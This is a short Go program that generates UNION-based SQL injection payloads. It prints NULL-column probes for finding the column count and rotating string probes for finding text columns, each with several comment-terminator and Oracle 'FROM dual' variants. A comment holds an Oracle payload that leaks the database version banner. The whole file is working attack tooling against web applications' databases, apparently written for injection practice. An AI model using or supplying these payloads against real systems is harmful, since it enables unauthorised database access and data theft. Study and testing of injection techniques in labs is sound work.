generate sql injection attacks

main.go

package main

import (
	"flag"
	"fmt"
	"strings"
)

/*
in Oracle, need:

version
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
*/
func main() {
	nColSearch := flag.Int("cn", 0, "number of columns of only nulls")
	nStringSearch := flag.Int("cs", 0, "number of columns of interleaved strings")
	flag.Parse()

	// generate lines like:
	// ' UNION SELECT NULL,NULL,NULL--
	for i := 1; i <= *nColSearch; i++ {
		nulls, _ := strings.CutPrefix(strings.Repeat(",NULL", i), ",")
		fmt.Printf("' UNION SELECT %s--\n", nulls)
		fmt.Printf("' UNION SELECT %s-- \n", nulls)
		fmt.Printf("' UNION SELECT %s#\n", nulls)
		fmt.Printf("' UNION SELECT %s# \n", nulls)
		fmt.Printf("' UNION SELECT %s FROM dual--\n", nulls)
	}

	// generate lines like:
	// ' UNION SELECT 'aa',NULL,NULL,NULL--
	// ' UNION SELECT NULL,'aa',NULL,NULL--
	if *nStringSearch > 0 {
		all := strings.Split("'aa'"+strings.Repeat(",NULL", *nStringSearch-1), ",")
		for i := 0; i < *nStringSearch; i++ {
			fmt.Printf("' UNION SELECT %s--\n", strings.Join(all, ","))
			fmt.Printf("' UNION SELECT %s-- \n", strings.Join(all, ","))
			fmt.Printf("' UNION SELECT %s#\n", strings.Join(all, ","))
			fmt.Printf("' UNION SELECT %s# \n", strings.Join(all, ","))
			fmt.Printf("' UNION SELECT %s FROM dual--\n", strings.Join(all, ","))
			rotate(all, 1)
		}
	}
}

func rotate[T any](ss []T, k int) {
	k = k % len(ss)
	if k != 0 {
		copy(ss, append(ss[len(ss)-k:], ss[:len(ss)-k]...))
	}
}